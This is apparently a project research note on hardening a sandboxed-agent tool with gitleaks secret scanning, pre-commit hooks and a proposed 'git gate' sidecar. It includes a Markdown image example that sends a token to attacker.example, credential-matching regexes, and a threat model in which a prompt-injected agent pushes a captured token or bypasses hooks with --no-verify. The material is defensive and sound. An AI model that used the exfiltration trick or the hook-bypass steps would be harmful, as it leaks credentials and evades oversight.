bot-bottle/docs/research/git-secret-scanning-hardening.md
2026-05-28 17:56:14 -04:00

Git secret scanning as further hardening

Research into whether bot-bottle should add a secret-scanning step to its git workflow — both on the host repo and (potentially) inside bottles — and what tools exist for it. Motivated by the threat model below: a secret accidentally git pushed to a public remote is already compromised the moment the push hits the wire, well before anyone clicks "merge."

Summary

A pre-commit / pre-push secret scanner is a cheap, high-leverage layer of defense-in-depth that doesn't replace any existing control (.gitignore, environment-variable hygiene, network egress guards) but catches the one case where everything else fails: a credential ending up in a tracked file or commit message and being pushed to a public remote. For bot-bottle specifically, gitleaks is the clearest fit — Go binary, MIT, scans full history including commit messages, runs fully offline, and integrates with the existing .githooks/ directory without adding a new runtime.

Attack vector: a secret pushed to a public GitHub repo

The naive mental model is "if I notice the leak before the PR is merged, I can force-push and the secret is gone." That mental model is wrong in two distinct ways, and both apply the instant git push completes — not at merge time.

1. The push itself publishes the secret

The moment a commit lands on a public GitHub repo — on any branch, in any open PR, on any fork — it is publicly fetchable by URL and broadcast by GitHub's event firehose:

  • The commit blob is reachable at github.com/<owner>/<repo>/commit/<sha> and via the raw API. No login or merge required.
  • GitHub's public events API streams every push as it happens. The GH Archive project mirrors that stream and republishes it; multiple Common-Crawl-style datasets ingest from it on a continuous basis.
  • Independent scrapers (and there are many) sit on the events API watching specifically for commits whose diffs match high-value credential patterns: AWS keys, GitHub PATs, Stripe keys, OAuth tokens, OpenAI keys, etc. Observed time-to-abuse for a leaked AWS key on a public push is on the order of seconds to minutes, so there is effectively no window in which "I'll just force-push" still works.
  • Even after a force-push, the orphaned commit remains reachable by SHA until GitHub garbage-collects it, on a schedule the repository owner does not control (and the SHA itself leaks via the events API). Treat any secret that has touched a public remote as burned: rotate it.

This is the dominant risk, and on its own it is enough to justify pre-push secret scanning.
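To make the scraper behavior concrete, here is a minimal sketch of pattern-matching over the added lines of a pushed diff. The regex is a simplified, illustrative pattern for the documented AWS access key ID shape (the AKIA prefix followed by 16 uppercase alphanumerics). Real scrapers and scanners use much larger rule sets, and the function names are hypothetical.

```python
import re

# Simplified illustrative pattern for an AWS access key ID.
# Real rule sets (gitleaks, TruffleHog) are broader and more precise.
AWS_ACCESS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")


def added_lines(diff_text):
    """Yield the content of lines a unified diff adds (leading '+' stripped)."""
    for line in diff_text.splitlines():
        # '+++' marks the new-file header, not added content.
        if line.startswith("+") and not line.startswith("+++"):
            yield line[1:]


def find_key_candidates(diff_text):
    """Return every substring of the added lines that looks like an AWS key ID."""
    hits = []
    for line in added_lines(diff_text):
        hits.extend(AWS_ACCESS_KEY_ID.findall(line))
    return hits
```

A pre-push scanner runs the same kind of match on the developer's machine, before the diff is visible to anyone else. That ordering is the only advantage the defender has.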

2. Render-time callbacks fire even on un-merged PRs

A separate, sneakier vector: a public PR doesn't have to be merged to cause an outbound request to a server the pusher controls. Opening the PR is enough. Rendering surfaces along the review path will fetch remote resources embedded in the diff or in PR metadata:

  • Markdown files in the diff are rendered with image and link preview support. An ![](https://attacker.example/pixel.png?token=…) in a new README pings the attacker the moment a reviewer (or GitHub's own renderer warming a cache) views the file. GitHub proxies most image fetches through camo.githubusercontent.com, which mitigates direct IP capture but does not stop the fetch itself — the attacker still gets the request, and the URL path can carry exfiltrated bytes.
  • PR body, commit message, and issue body all render markdown with the same image/link semantics. A poisoned commit message with an embedded image URL pings home when the PR is opened in the web UI, regardless of merge state.
  • Link unfurls in PR descriptions, Slack notifications wired to the repo, and various CI bots all dereference URLs at preview time. Each is an independent "ping home" opportunity.
  • CI on PR open runs on the fork's HEAD by default for many workflow types. Any curl in a build step is an exfil channel before a human ever looks at the PR.

The composite point: by the time a reviewer thinks "hmm, this looks suspicious, let me close without merging," the bytes that mattered are already on the attacker's box. Detection has to be at commit time (or push time at the latest), not at review time.
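As an illustration of the image vector, the sketch below lists the remote hosts that inline Markdown images in a commit message, PR body, or changed file would cause a renderer to contact. It is a hypothetical helper, not part of any tool named in this note. It handles only the inline ![alt](url) form and ignores reference-style images and raw HTML.

```python
import re
from urllib.parse import urlsplit

# Inline Markdown image: ![alt](url "optional title")
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^\s)>]+)")


def remote_image_hosts(markdown_text):
    """Return the sorted hosts that inline images in the text would be fetched from."""
    hosts = set()
    for url in INLINE_IMAGE.findall(markdown_text):
        parts = urlsplit(url)
        # Relative paths have no scheme and stay inside the repo; skip them.
        if parts.scheme in ("http", "https") and parts.hostname:
            hosts.add(parts.hostname)
    return sorted(hosts)
```

Any host this returns that is not one the project already trusts is a candidate "ping home" endpoint, whether or not the change is ever merged.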

Why this matters for bot-bottle

Two surfaces are exposed:

  1. The bot-bottle repo itself. Development happens on a host with BOT_BOTTLE_OAUTH_TOKEN, Gitea tokens, and other credentials in the environment. A fixture, test snapshot, log capture, or pasted-in debug output could carry one of them into a tracked file. The repo's Gitea remote is private, but mirrors or GitHub forks may not be.
  2. Bottles that push to external remotes. An agent inside a bottle that has been granted git push credentials to a public repo is one prompt-injection away from being induced to commit a captured token and push it. The egress guard catches most exfiltration channels (statsig, npm, arbitrary HTTPS), but git push to an allowlisted code host is by design an outbound channel that works. That is the whole point of letting the agent push code. A secret scanner inside the bottle's git hooks is the only layer that can intercept content before it leaves on an otherwise-legitimate channel.

The first surface is the primary one for this note. The second looks harder — anything inside the bottle is by assumption adversary-controlled, so an in-bottle hook can be bypassed with --no-verify, removed outright, or simply not configured — but it yields to the same trick already used for the OAuth token and HTTPS inspection: move the check across a kernel-enforced process boundary that the agent cannot reach.

Solution for the bottle surface: a git gate

Route bottle-side git push through an intermediary git endpoint — a "git gate" — that runs gitleaks on the incoming objects before forwarding to the real remote:

  • The bottle's git remote is rewritten to point at the gate (e.g. git@gate.bottle.local:owner/repo.git, or an HTTPS endpoint on a loopback / sidecar address). The agent inside the bottle sees only the gate URL.
  • The gate runs as a separate process / container that the bottle's unprivileged agent cannot read or modify. It holds the real push credential (deploy key, PAT, ssh agent socket) — the bottle never sees it, same as the auth-injecting proxy for ANTHROPIC_BASE_URL in agent-credential-proxy-landscape.md.
  • On receive, the gate runs gitleaks detect against the incoming refs (and their message text) in a temporary working tree. Clean pushes are forwarded to the real remote. Findings cause the push to be rejected; the agent sees a normal-looking remote: rejected message.
  • Network egress out of the bottle is locked to the gate only. Direct pushes to github.com, gitlab.com, etc., fail at the egress layer, so the agent cannot bypass the gate by reconfiguring the remote URL. The egress guard already in network-egress-guard.md is the load-bearing control here.
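One possible shape for the receive-side check, assuming the gate is implemented as a git pre-receive hook (this note does not commit to that). Git feeds such a hook one "<old> <new> <ref>" line per updated ref on stdin. The sketch maps each line to the commit range that is actually new and builds the gitleaks command for it. The function names and the repository path are hypothetical. It is also an assumption to verify that gitleaks accepts multiple space-separated git log arguments in --log-opts.

```python
ZERO_SHA = "0" * 40  # all-zero id git uses for "no object" (SHA-1 repositories)


def revision_args(old, new):
    """Map one pre-receive update (old, new) to `git log` revision arguments.

    Returns None when the ref is being deleted, since no new content arrives.
    """
    if new == ZERO_SHA:
        return None
    if old == ZERO_SHA:
        # New ref: scan only commits not already reachable from existing refs.
        return f"{new} --not --all"
    return f"{old}..{new}"


def gitleaks_argv(repo_path, log_opts):
    """Build the gitleaks invocation for one update (flags as used in this note)."""
    return ["gitleaks", "detect", "--source", repo_path,
            f"--log-opts={log_opts}", "--redact"]


def plan_scans(stdin_lines, repo_path):
    """Turn pre-receive stdin lines into the list of gitleaks commands to run."""
    commands = []
    for line in stdin_lines:
        old, new, _ref = line.split()
        opts = revision_args(old, new)
        if opts is not None:
            commands.append(gitleaks_argv(repo_path, opts))
    return commands
```

The hook would run each command (for example with subprocess.run) and exit non-zero if any of them does, which makes git reject the whole push. By default gitleaks exits with status 1 when it reports findings.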

Properties this gives:

  • --no-verify does not help the attacker — the check runs on the receiving side, not in a client hook.
  • Bypass attempts fail closed. Removing the remote, force-pushing, pushing to a different host, or shelling out around git all hit the same egress allowlist.
  • The push credential never enters the bottle. Compromising the agent doesn't compromise the credential, only the ability to ask the gate to push on its behalf — and the gate refuses dirty pushes.
  • Pattern is reusable. The gate is shape-compatible with the auth-injecting proxy and with pipelock's TLS interception: a sidecar that holds the credential, enforces a policy on traffic, and is unreachable by the unprivileged in-bottle UID.

Open questions deferred to design work, not blockers for this note:

  • SSH vs HTTPS for the bottle→gate hop. SSH lets the agent use a per-bottle key the gate authenticates; HTTPS over loopback is simpler and pairs naturally with pipelock.
  • Whether the gate should also enforce repo / branch allowlists per bottle, or stay narrowly focused on secret scanning. Probably narrow first, expand later.
  • Performance on large pushes. gitleaks on a few-MB diff is sub-second; on a large monorepo first push it may take seconds. Acceptable.

Tool landscape (2026)

| Tool | Install | Full history | Commit msgs | Detection | Status | License |
|---|---|---|---|---|---|---|
| gitleaks | brew install gitleaks | yes (--log-opts="--all") | yes | regex + entropy, ~150 rules | very active (v8.x) | MIT |
| TruffleHog v3 | brew, Docker, GH Action | yes | yes | regex + live API verification (700+ types) | very active | AGPL-3.0 |
| detect-secrets (Yelp) | pip install | working tree + baseline | no | regex + entropy | active, slower cadence | Apache 2.0 |
| git-secrets (AWS Labs) | brew | yes (--scan-history) | yes | regex only, AWS-focused | maintenance mode since ~2021 | Apache 2.0 |
| ggshield (GitGuardian) | pip install | yes | yes | proprietary ML + regex, optional verified | very active, commercial | MIT CLI, SaaS engine |

Other names that surfaced but do not fit: Semgrep (general SAST, not git-history-native), whispers (Python, low adoption).

Notes on the contenders:

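  • gitleaks is the de-facto open-source standard. The protect --staged mode is purpose-built for pre-commit; the detect --log-opts="--all" mode walks every commit including message text. No network dependency. Note that gitleaks v8.19.0 deprecated detect and protect in favor of gitleaks git and gitleaks dir; the older commands still work but are hidden from --help.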
  • TruffleHog v3 is the strongest one-shot auditor because it can make live API calls to confirm whether a found credential is still valid. AGPL is fine for internal use but a consideration if the detection step gets embedded in a redistributable artifact. Best as a "run once on history" tool, not as the everyday hook.
  • detect-secrets is well-loved for its baseline-file workflow (you declare existing secrets as known and only fail on new ones), but commit-message scanning is not first-class.
  • git-secrets is effectively superseded by gitleaks. No reason to start a new project on it.
  • ggshield is good if you want a hosted dashboard and incident management, but it ships repo content to GitGuardian's API by default — wrong fit for a project whose entire premise is sandbox isolation.

Commit message scanning

Several real-world leaks have come from secrets pasted into commit messages (often by automation that includes captured CLI output in auto-generated messages). gitleaks, TruffleHog, git-secrets, and ggshield all scan message text in history mode. detect-secrets does not — it is content-focused. Anyone using detect-secrets should pair it with a separate message-scanning step.
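A separate message-scanning step can be small. The sketch below is a hypothetical core for a commit-msg hook: git passes the hook the path of the message file as its first argument, and the hook would read that file and hand the text to this function. The two patterns are illustrative only (the classic GitHub PAT shape and a PEM private-key header), not a complete rule set.

```python
import re

# Illustrative patterns only; a real deployment would reuse a scanner's rule set.
PATTERNS = {
    "github-pat-classic": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private-key-header": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def scan_commit_message(message):
    """Return the sorted names of the patterns that match the commit message."""
    # Skip '#' comment lines, which git strips from the final message by default.
    body = "\n".join(
        line for line in message.splitlines() if not line.startswith("#")
    )
    return sorted(name for name, rx in PATTERNS.items() if rx.search(body))
```

A hook built on this would exit non-zero whenever the returned list is non-empty, which aborts the commit before the message ever enters history.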

Recommendations, in priority order, for the host bot-bottle repo:

  1. One-time retro scan with gitleaks: gitleaks detect --source . --log-opts="--all" --redact. This catches anything currently in history, including commit messages; --redact keeps the secret values themselves out of the rendered output. Treat any hit as a credential that must be rotated, not as a "fix the commit" problem (see the attack-vector section above for why).
  2. Add a pre-commit hook in .githooks/ that runs gitleaks protect --staged. Fits the project's existing pattern (the conventional-commits commit-msg hook lives there), needs no new runtime, fully offline.
  3. Optional one-time live-verification pass with TruffleHog: trufflehog git file://. --only-verified. Tells you whether any historically leaked credential is still active — actionable in a way pattern-matching alone is not.
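For the retro scan in step 1, adding --report-format json --report-path <file> makes gitleaks write its findings to a file that can be turned into a rotation checklist. The sketch below assumes the report is a JSON array whose objects carry RuleID, File, and Commit keys, as gitleaks v8 reports are expected to. The helper name is hypothetical.

```python
import json
from collections import defaultdict


def rotation_checklist(report_json):
    """Group findings by rule so each leaked credential type is reviewed once.

    Assumes a JSON array of objects with 'RuleID', 'File' and 'Commit' keys.
    """
    by_rule = defaultdict(set)
    for finding in json.loads(report_json):
        # Short commit id plus path is enough to locate the leak for triage.
        location = f"{finding.get('Commit', '')[:8]}:{finding.get('File', '')}"
        by_rule[finding.get("RuleID", "unknown")].add(location)
    return {rule: sorted(locs) for rule, locs in sorted(by_rule.items())}
```

Each key in the result is a kind of credential to rotate. The locations only show where it leaked, since rewriting those commits does not un-publish the secret.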

For the bottle surface, the follow-up is the git-gate design sketched above: a sidecar git endpoint that bottles push to, that runs gitleaks on incoming refs before forwarding to the real remote, with egress locked to the gate so the agent cannot push directly. Tracked as a future PRD; ordering it after the network egress guard is correct because the egress allowlist is the control that prevents bypass and is therefore the prerequisite.

Sources